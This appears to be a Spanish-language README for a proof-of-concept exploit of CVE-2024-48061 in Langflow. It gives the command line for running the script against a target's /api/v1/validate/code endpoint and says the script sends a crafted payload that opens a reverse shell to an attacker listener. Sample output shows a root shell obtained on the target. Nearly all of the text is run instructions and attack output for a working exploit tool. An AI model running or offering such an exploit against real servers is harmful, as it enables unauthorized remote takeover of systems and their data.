
CVE-2024-48061 Langflow vulnerable a la ejecución remota de código. Poc
python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>
Este script explota un endpoint API vulnerable en /api/v1/validate/code en el servidor web objetivo.
Primero verifica la presencia de la ruta vulnerable, luego inicia un listener TCP en la IP y puerto
del listener especificados. Una vez que el listener está listo, envía un payload especialmente diseñado
al objetivo para generar una shell inversa que se conecta de vuelta al listener.
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[+] Vulnerability detected at http://192.168.0.2:7860/api/v1/validate/code
[+] Listening on 192.168.0.3:4444 ...
[+] Sending payload to http://192.168.0.2:7860/api/v1/validate/code
[+] Connection from 192.168.0.2:60440
# whoami
whoami
root
# exit
[*] Exiting shell.
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[-] Doesn't look vulnerable